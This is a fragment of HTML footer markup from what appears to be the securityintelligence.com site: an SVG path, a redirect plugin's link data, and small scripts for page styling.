.62H7.42Zm-5,8.42H4.9v.84H2.38Zm0-1.69H4.9V8.4H2.38Zm0-1.68H4.9v.84H2.38Zm0-1.68H4.9V5H2.38ZM.69,12.6H6.58v.84H.69Zm0-1.68H6.58v.84H.69Zm0-8.41H6.58v.84H.69ZM.69.82H6.58v.85H.69Z" /> </svg> </span> </a> </div> </section> </div> </div> <script> window._appInfo = window._appInfo || {}; window._appInfo.newsCredAPIKey = "YXJ0aWNsZT00MTQ0YmIzNmNjNDQxMWVlOTQyYjRlNWI2N2ZjMzg0Yg=="; </script> <!-- FOOTER SCRIPTS --> <script type="text/javascript" id="qppr_frontend_scripts-js-extra"> /* <![CDATA[ */ var qpprFrontData = {"linkData":{"https:\/\/securityintelligence.com\/defining-security-intelligence\/":[0,0,"https:\/\/securityintelligence.com\/defintion-security-intelligence\/#.VS_NwpNnuZA"],"https:\/\/securityintelligence.com\/security-vulnerability-management-its-about-outcomes-not-activity\/":[0,0,""]},"siteURL":"https:\/\/securityintelligence.com","siteURLq":"https:\/\/securityintelligence.com"}; /* ]]> */ 
</script> <script type="text/javascript" src="https://securityintelligence.com/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.2.4" id="qppr_frontend_scripts-js"></script> <script> setTimeout(() => { document.querySelector(".related_content").style.visibility = 'visible'; document.querySelector(".related_content.article.article_grid.article__mobile--card.article--IBM_blog > c4d-card > c4d-card-footer").shadowRoot.querySelector("#link").style.justifyContent = 'flex-start'; }, 100); </script> </body> </html>